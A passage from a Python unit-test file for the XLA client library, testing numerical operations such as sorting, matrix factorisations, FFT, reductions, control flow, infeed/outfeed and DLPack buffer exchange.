shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.S32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape, integrality, and range
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertEqual(result[0].dtype, np.int32)
self.assertTrue(np.all(lo <= result[0]))
self.assertTrue(np.all(result[0] < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
ops.Cholesky(ops.Constant(c, np.tril(np.dot(l, l.T))))
self._ExecuteAndCompareClose(c, expected=[l], rtol=1e-4)
def testSort(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
c = self._NewComputation()
ops.Sort(c, [ops.Constant(c, keys)], is_stable=True)
self._ExecuteAndCompareClose(
c,
expected=[np.array([[1, 2, 3, 4], [1, 2, 3, 4]], dtype=np.float32)])
def testSortKeyVal(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
ops.Sort(c, (ops.Constant(c, keys), ops.Constant(c, values)), dimension=0)
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_allclose(result[0], [[2, 1, 1, 2], [3, 4, 4, 3]])
np.testing.assert_equal(result[1], [[0, 5, 2, 7], [4, 1, 6, 3]])
def testSortCustomComparator(self):
b = self._NewComputation("comparator")
p0 = ops.Parameter(b, 0, xla_client.shape_from_pyval(NumpyArrayF32(0)))
q0 = ops.Parameter(b, 1, xla_client.shape_from_pyval(NumpyArrayF32(0)))
p1 = ops.Parameter(b, 2, xla_client.shape_from_pyval(NumpyArrayS32(0)))
q1 = ops.Parameter(b, 3, xla_client.shape_from_pyval(NumpyArrayS32(0)))
ops.Or(ops.Lt(p0, q0), ops.And(ops.Eq(p0, q0), ops.Gt(p1, q1)))
comparator = b.build()
keys = np.array([[2, 3, 1, 3], [3, 1, 2, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
ops.Sort(
c, (ops.Constant(c, keys), ops.Constant(c, values)),
dimension=1,
comparator=comparator)
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_allclose(result[0], [[1, 2, 3, 3], [1, 2, 2, 3]])
np.testing.assert_equal(result[1], [[2, 0, 3, 1], [5, 7, 6, 4]])
def testQR(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
ops.Tuple(c, ops.QR(ops.Constant(c, a), full_matrices=True))
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testEigh(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
a = (a + a.T) / 2
c = self._NewComputation()
ops.Tuple(c, ops.Eigh(ops.Constant(c, a), lower=True))
# TODO(b/129396575): Turn this test back on when it passes without
# fastmath.
# v, w = self._Execute(c, ())
# self.assertLess(np.linalg.norm(np.dot(a, v) - w * v), 1e-3)
def testSVD(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
ops.Tuple(c, ops.SVD(ops.Constant(c, a)))
u, d, v = self._Execute(c, ())
self.assertLess(np.linalg.norm(a - np.matmul(u * d, v.T)), 1e-3)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
ops.TriangularSolve(
ops.Constant(c, a_vals),
ops.Constant(c, b_vals),
left_side=False,
lower=True,
transpose_a=ops.TriangularSolveOptions_Transpose.TRANSPOSE,
unit_diagonal=False)
self._ExecuteAndCompareClose(
c,
expected=[
np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
],
dtype=np.float32)
],
rtol=1e-4)
def testApproxTopK(self):
if self.backend.platform != "tpu":
self.skipTest("ApproxTopK is only supported on TPU")
k = 10
qy_size = 256
db_size = 3000
feature = 128
recall_target = 0.95
b = self._NewComputation()
p0 = ops.Parameter(b, 0, xla_client.shape_from_pyval(NumpyArrayF32(0)))
q0 = ops.Parameter(b, 1, xla_client.shape_from_pyval(NumpyArrayF32(0)))
ops.Parameter(b, 2, xla_client.shape_from_pyval(NumpyArrayS32(0)))
ops.Parameter(b, 3, xla_client.shape_from_pyval(NumpyArrayS32(0)))
ops.Gt(p0, q0)
comparator = b.build()
qy_shape = [qy_size, feature]
db_shape = [feature, db_size]
rng = np.random.RandomState(0)
qy_arg = rng.randn(*qy_shape).astype(np.float32)
db_arg = rng.randn(*db_shape).astype(np.float32)
b = self._NewComputation()
qy = ops.Parameter(b, 0, xla_client.shape_from_pyval(qy_arg))
db = ops.Parameter(b, 1, xla_client.shape_from_pyval(db_arg))
scores = ops.Dot(qy, db)
iota = ops.Iota(
b,
xla_client.Shape.array_shape(xla_client.PrimitiveType.S32,
(qy_size, db_size)), 1)
init_val = ops.Constant(b, np.float32(-1))
init_arg = ops.Constant(b, np.int32(-1))
ground_truth = ops.TopK(scores, k=k)
approx_topk = ops.ApproxTopK(
b, [scores, iota], [init_val, init_arg],
top_k=k,
reduction_dim=1,
comparator=comparator,
recall_target=recall_target)
ops.Tuple(b, [
ops.GetTupleElement(ground_truth, 1),
ops.GetTupleElement(approx_topk, 1)
])
results = self._Execute(b, [qy_arg, db_arg])
ground_truth_docids = [set(x) for x in results[0]]
hits = sum(
len(
list(x
for x in approx_topk_per_q
if x in ground_truth_docids[q]))
for q, approx_topk_per_q in enumerate(results[1]))
self.assertGreater(hits / (qy_size * k), recall_target)
def testIsConstant(self):
c = self._NewComputation()
a = ops.Constant(c, np.int32(3))
b = ops.Constant(c, np.int32(1))
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayS32(0)))
const_expr = ops.Sub(b, a)
non_const_expr = ops.Mul(const_expr, x)
self.assertTrue(c.is_constant(const_expr))
self.assertFalse(c.is_constant(non_const_expr))
def testGather(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
indices = np.array([[[0, 2], [2, 1]], [[1, 2], [2, 0]]], dtype=np.int32)
dnums = xla_client.GatherDimensionNumbers()
dnums.offset_dims.append(1)
dnums.offset_dims.append(2)
dnums.start_index_map.append(0)
dnums.start_index_map.append(1)
dnums.index_vector_dim = 2
c = self._NewComputation()
ops.Gather(
ops.Constant(c, a),
ops.Constant(c, indices),
dnums,
slice_sizes=[1, 1])
g, = self._Execute(c, ())
expected = np.array([[[[2, 7]]], [[[5, 6]]]], dtype=np.int32)
np.testing.assert_allclose(g, expected, rtol=1e-4)
def testFft(self):
if self.backend.platform == "tpu":
self.skipTest("TPU only supports 1D FFT")
shape = [2, 3, 4, 5]
rng = np.random.RandomState(0)
a = rng.randn(*shape) + 1.0j * rng.randn(*shape)
a = a.astype(np.complex64)
# FFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.FFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.fftn(a, axes=(1, 2, 3))], rtol=1e-4)
# IFFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.IFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.ifftn(a, axes=(1, 2, 3))], rtol=1e-4)
# RFFT
b = rng.randn(*shape).astype(np.float32)
c = self._NewComputation()
ops.Fft(ops.Constant(c, b), xla_client.FftType.RFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.rfftn(b, axes=(1, 2, 3))], rtol=1e-4)
# IRFFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.IRFFT, [3, 4, 8])
self._ExecuteAndCompareClose(
c, expected=[np.fft.irfftn(a, axes=(1, 2, 3))], rtol=1e-4)
def testNextAfter(self):
c = self._NewComputation()
ops.NextAfter(
ops.Constant(c, np.array([1, 2], dtype=np.float32)),
ops.Constant(c, np.array([2, 1], dtype=np.float32)))
out, = self._Execute(c, ())
eps = np.finfo(np.float32).eps
np.testing.assert_equal(
np.array([eps + 1, 2 - eps], dtype=np.float32), out)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testRegularizedIncompleteBeta(self, dtype):
x = np.array([0.53787335, 0.24015466, 0.47494545, 0.13567594, 0.95114538],
dtype=dtype)
a = np.array([0.00753073, 0.34813385, 0.30485708, 1.29298632, 0.51472606],
dtype=dtype)
b = np.array([0.55688389, 0.59794214, 0.42661022, 1.59748339, 0.95047677],
dtype=dtype)
c = self._NewComputation()
ops.RegularizedIncompleteBeta(
ops.Constant(c, a), ops.Constant(c, b), ops.Constant(c, x))
expected = np.array(
[0.98923271, 0.48575411, 0.57952568, 0.12579775, 0.96989155])
self._ExecuteAndCompareClose(c, expected=[expected], rtol=2e-2)
tests.append(SingleOpTest)
class EmbeddedComputationsTest(ComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantComputation(self, in_dtype, out_dtype):
"""Computation (A) -> B that returns a constant 1 for any input."""
c = self._NewComputation("constant_{}_{}_one".format(
in_dtype.__name__, out_dtype.__name__))
ops.Parameter(
c, 0,
xla_client.shape_from_pyval(np.array(
0, dtype=in_dtype)).with_major_to_minor_layout_if_absent())
ops.Constant(c, out_dtype(1))
return c.build()
def _CreateMulBy2Computation(self, dtype):
"""Computation (dtype) -> dtype that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
ops.Mul(
ops.Parameter(
c, 0,
xla_client.shape_from_pyval(np.array(
0, dtype=dtype)).with_major_to_minor_layout_if_absent()),
ops.Constant(c, dtype(2.0)))
return c.build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
ops.Mul(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0))),
ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0))))
return c.build()
def _CreateBinaryAddComputation(self, dtype):
"""Computation (dtype, dtype) -> dtype that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
shape = shape.with_major_to_minor_layout_if_absent()
ops.Add(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
def _CreateBinaryGeComputation(self, dtype):
"""Computation (dtype, dtype) -> bool that tests param0 >= param1."""
c = self._NewComputation("param0_lt_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
shape = shape.with_major_to_minor_layout_if_absent()
ops.Ge(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
def _MakeSample3DArray(self, dtype):
return np.array([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]],
dtype=dtype)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testCall(self, dtype):
c = self._NewComputation()
ops.Call(
c,
self._CreateMulBy2Computation(dtype),
operands=(ops.Constant(c, dtype(5.0)),))
self._ExecuteAndCompareClose(c, expected=[10.0])
@parameterized.named_parameters({
"testcase_name": "_{}_{}".format(in_dtype.__name__, out_dtype.__name__),
"in_dtype": in_dtype,
"out_dtype": out_dtype,
} for in_dtype, out_dtype in [[np.float32, np.int32]])
def testMapEachElementToConstant(self, in_dtype, out_dtype):
c = self._NewComputation()
ops.Map(c,
[ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=in_dtype))],
self._CreateConstantComputation(in_dtype, out_dtype), [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1, 1, 1]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testMapMulBy2(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
ops.Map(c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
self._CreateMulBy2Computation(dtype), [0])
self._ExecuteAndCompareClose(c, expected=[[2.0, 4.0, 6.0, 8.0]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSimpleMapChain(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
# Chains a map of constant-out with a map of mul-by-2
c = self._NewComputation()
const = ops.Map(
c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
self._CreateConstantComputation(dtype, dtype), [0])
ops.Map(c, [const], self._CreateMulBy2Computation(dtype), [0])
self._ExecuteAndCompareClose(c, expected=[[2.0, 2.0, 2.0, 2.0]])
# TODO(b/154752816): bfloat16 crashes in evaluator.
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDivVectorsWithMap(self, dtype):
def DivComputation():
c = self._NewComputation("div_param0_by_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
ops.Div(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
c = self._NewComputation()
ops.Map(c, (ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype)),
ops.Constant(c, np.array([5.0, 5.0, 4.0, 4.0], dtype=dtype))),
DivComputation(), [0])
self._ExecuteAndCompareClose(
c, expected=[[0.2, 0.4, 0.75, 1.0]], rtol=1e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSelectAndScatter(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
operand = ops.Constant(
c, np.array([[1., 2., 6.], [4., 5., 3.]], dtype=dtype))
window_dimensions = (2, 1)
window_strides = (1, 2)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID,
c.get_shape(operand).dimensions(), window_dimensions, window_strides)
ops.SelectAndScatterWithGeneralPadding(
operand,
select=self._CreateBinaryGeComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
padding=padding,
source=ops.Constant(c, np.array([[0.1, 0.2]], dtype=dtype)),
init_value=ops.Constant(c, np.array(1, dtype=dtype)),
scatter=self._CreateBinaryAddComputation(dtype))
self._ExecuteAndCompareClose(
c, expected=[[[1., 1., 1.2], [1.1, 1., 1.]]], rtol=5e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduce1DtoScalar(self, dtype):
c = self._NewComputation()
ops.Reduce(
c,
operands=[
ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))
],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=[0])
self._ExecuteAndCompareClose(c, expected=[10])
# TODO(phawkins): test comparison harness doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}_dim{}".format(dtype.__name__, dim),
"dtype": dtype,
"dim": dim,
} for dtype in float_dtypes if dtype != bfloat16 for dim in range(2))
def testReduce2DTo1D(self, dtype, dim):
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
ops.Reduce(
c,
operands=[ops.Constant(c, input_array)],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=[dim])
self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dim)])
@parameterized.named_parameters({
"testcase_name": "_{}_dims[{}]".format(dtype.__name__, dims),
"dtype": dtype,
"dims": tuple(dims)
} for dtype in float_dtypes for dims in itertools.permutations(range(3)))
def testReduce3DAllPossibleWaysF32(self, dtype, dims):
input_array = self._MakeSample3DArray(dtype)
c = self._NewComputation()
ops.Reduce(
c,
operands=[ops.Constant(c, input_array)],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=dims)
self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dims)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowValidUnitStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowSameUnitStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.SAME, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.], [4., 5., 6.]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowValidGeneralStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 2)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 9.]]])
def testReduceWindowVariadic(self):
c = self._NewComputation("reducer")
shape = xla_client.shape_from_pyval(np.array(0, dtype=np.int32))
shape = shape.with_major_to_minor_layout_if_absent()
ps = [ops.Parameter(c, i, shape) for i in range(4)]
which = ops.Ge(ps[0], ps[2])
ops.Tuple(
c, [ops.Select(which, ps[0], ps[2]),
ops.Select(which, ps[1], ps[3])])
reducer = c.build()
key_array = np.array([[1, 5, 6], [4, 2, 3]], dtype=np.int32)
val_array = np.array([[7, 8, 9], [10, 11, 12]], dtype=np.int32)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, key_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operands=[ops.Constant(c, key_array),
ops.Constant(c, val_array)],
init_values=[
ops.Constant(c, np.int32(0)),
ops.Constant(c, np.int32(0))
],
computation=reducer,
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[4, 5, 6]], [[10, 8, 9]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testWhile(self, dtype):
def LessThan10Cond():
c = self._NewComputation("test_lt_10")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
ops.Lt(ops.Parameter(c, 0, shape), ops.Constant(c, dtype(10.)))
return c.build()
cond = LessThan10Cond()
body = self._CreateMulBy2Computation(dtype)
c = self._NewComputation()
init = ops.Constant(c, dtype(1.))
ops.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=[16.])
def testConditionalTrue(self):
c = self._NewComputation()
pred = ops.Constant(c, np.bool_(True))
true_operand = ops.Constant(c, np.float32(3.))
true_computation = self._CreateMulBy2Computation(np.float32)
false_operand = ops.Constant(c, np.float32(2.))
false_computation = self._CreateConstantComputation(
np.float32, np.float32)
ops.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=[6.])
def testConditionalFalse(self):
c = self._NewComputation()
pred = ops.Constant(c, np.bool_(False))
true_operand = ops.Constant(c, np.float32(3.))
true_computation = self._CreateMulBy2Computation(np.float32)
false_operand = ops.Constant(c, np.float32(2.))
false_computation = self._CreateConstantComputation(
np.float32, np.float32)
ops.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=[1.])
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
ops.GetTupleElement(
ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_infeed[0]).with_major_to_minor_layout_if_absent()), 0)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
for item in to_infeed:
device.transfer_to_infeed(item)
for item in to_infeed:
result, = xla_client.execute_with_python_values(
compiled_c, (), backend=self.backend)
self.assertEqual(result, item)
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedTuple(self):
to_infeed = (NumpyArrayS32([1, 2, 3, 4]), NumpyArrayS32([[7], [8]]))
c = self._NewComputation()
ops.GetTupleElement(
ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_infeed).with_major_to_minor_layout_if_absent()), 0)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
device.transfer_to_infeed(to_infeed)
result = xla_client.execute_with_python_values(
compiled_c, (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_equal(result[0], to_infeed[0])
np.testing.assert_equal(result[1], to_infeed[1])
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x_and_token = ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_round_trip[0]).with_major_to_minor_layout_if_absent())
x = ops.GetTupleElement(x_and_token, 0)
token = ops.GetTupleElement(x_and_token, 1)
outfeed_shape = xla_client.shape_from_pyval(
to_round_trip[0]).with_major_to_minor_layout_if_absent()
ops.OutfeedWithToken(x, token, outfeed_shape)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
for want in to_round_trip:
execution = threading.Thread(target=lambda: compiled_c.execute([]))
execution.start()
device.transfer_to_infeed(want)
got = device.transfer_from_outfeed(outfeed_shape)
execution.join()
self.assertEqual(want, got)
def testScatter(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
scatter_indices = np.array([0, 2], dtype=np.int32)
updates = np.array([[10, 20, 30], [70, 80, 90]], dtype=np.int32)
dnums = xla_client.ScatterDimensionNumbers()
dnums.update_window_dims.append(1)
dnums.inserted_window_dims.append(0)
dnums.scatter_dims_to_operand_dims.append(0)
dnums.index_vector_dim = 1
c = self._NewComputation()
ops.Scatter(
ops.Constant(c, a), ops.Constant(c, scatter_indices),
ops.Constant(c, updates), self._CreateBinaryAddComputation(np.int32),
dnums)
expected = np.array([[10, 21, 32], [3, 4, 5], [76, 87, 98]],
dtype=np.int32)
self._ExecuteAndCompareClose(c, expected=[expected])
class DeviceTest(ComputationTest):
def testPlatform(self):
for device in self.backend.local_devices():
self.assertEqual(device.platform, self.backend.platform)
tests.append(DeviceTest)
class ErrorTest(ComputationTest):
def setUp(self):
super(ErrorTest, self).setUp()
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testCompileWithWrongElementTypeInLayout(self):
c = self._NewComputation()
c.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
ops.Parameter(c, 0, xla_client.shape_from_pyval(self.s32_scalar_2))
c.clear_op_metadata()
options = xla_client.CompileOptions()
options.argument_layouts = [
xla_client.Shape.array_shape(np.dtype(np.float32), [])
]
def TestFun():
return self.backend.compile(c.build(), compile_options=options)
self.assertRaisesRegex(
RuntimeError, r".*Invalid argument shape.*"
r"expected s32\[\], got f32\[\].*", TestFun)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
ops.Parameter(c, 0, xla_client.shape_from_pyval(self.s32_scalar_2))
c.clear_op_metadata()
def TestFun():
return xla_client.execute_with_python_values(
self.backend.compile(c.build()), [self.f32_scalar_2], self.backend)
self.assertRaisesRegex(
RuntimeError, r"Invalid argument: Argument does not match.*"
r"want s32\[\], got f32\[\].*", TestFun)
tests.append(EmbeddedComputationsTest)
class ComputationRootTest(ComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
result = ops.Add(x, ops.Constant(c, np.float32(3.14)))
ops.Add(result, ops.Constant(c, np.float32(1.618)))
arg = NumpyArrayF32(1.0)
compiled_c = self.backend.compile(c.build(result))
ans, = xla_client.execute_with_python_values(
compiled_c, [arg], backend=self.backend)
np.testing.assert_allclose(ans, 4.14)
tests.append(ComputationRootTest)
class SetShardingTest(ComputationTest):
"""Tests related to set OpSharding."""
def testSetSharding(self):
c = self._NewComputation()
sharding = xla_client.OpSharding()
sharding.type = xla_client.OpSharding.Type.REPLICATED
sharding.tile_assignment_dimensions = [1]
sharding.tile_assignment_devices = [0]
c.set_sharding(sharding)
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
c.clear_sharding()
result = ops.Add(x, ops.Constant(c, np.float32(3.14)))
ops.Add(result, ops.Constant(c, np.float32(1.618)))
arg = NumpyArrayF32(1.0)
compiled_c = self.backend.compile(c.build(result))
ans, = xla_client.execute_with_python_values(
compiled_c, [arg], backend=self.backend)
np.testing.assert_allclose(ans, 4.14)
tests.append(SetShardingTest)
testcase_shapes = [
(),
(1,),
(2, 3),
(2, 0),
(0, 7),
(4, 1, 2),
(2, 1, 3),
(2, 4, 1),
(3, 1),
(1, 3),
]
def FormatShapeAndDtype(shape, dtype):
return "_{}[{}]".format(np.dtype(dtype).name, ",".join(map(str, shape)))
class DLPackTest(parameterized.TestCase):
def setUp(self):
super(DLPackTest, self).setUp()
self.backend = xla_backend()
if self.backend.platform not in ("cpu", "gpu"):
self.skipTest("DLPack requires CPU or GPU")
self.cpu_backend = (
self.backend
if self.backend.platform == "cpu" else xla_client.make_cpu_client())
self.gpu_backend = (
self.backend if self.backend.platform == "gpu" else None)
# pylint: disable=g-complex-comprehension
# pyformat: disable
@parameterized.named_parameters({
"testcase_name": "{}_own={}_gpu={}".format(
FormatShapeAndDtype(shape, dtype), take_ownership, gpu),
"dtype": dtype,
"shape": shape,
"take_ownership": take_ownership,
"gpu": gpu
} for dtype in dlpack_dtypes for shape in testcase_shapes
for take_ownership in [False, True]
for gpu in [False, True])
# pyformat: enable
def testRoundTrip(self, dtype, shape, take_ownership, gpu):
if gpu and self.gpu_backend is None:
raise unittest.SkipTest("Test not running with GPU support")
backend = self.gpu_backend if gpu else self.cpu_backend
if dtype == np.bool_:
x = np.random.randint(0, 2, size=shape).astype(np.bool_)
else:
x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
buffer = backend.buffer_from_pyval(x)
dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=take_ownership)
del buffer # Free "buffer" to make sure dlt retains ownership.
self.assertEqual(type(dlt).__name__, "PyCapsule")
y = xla_client._xla.dlpack_managed_tensor_to_buffer(
dlt, self.cpu_backend, self.gpu_backend)
np.testing.assert_array_equal(
x.astype(np.uint8) if dtype == np.bool_ else x, y.to_py())
def testTensorsCanBeConsumedOnceOnly(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
def ConsumeDLPackTensor():
_ = xla_client._xla.dlpack_managed_tensor_to_buffer(dlt, self.backend)
ConsumeDLPackTensor()
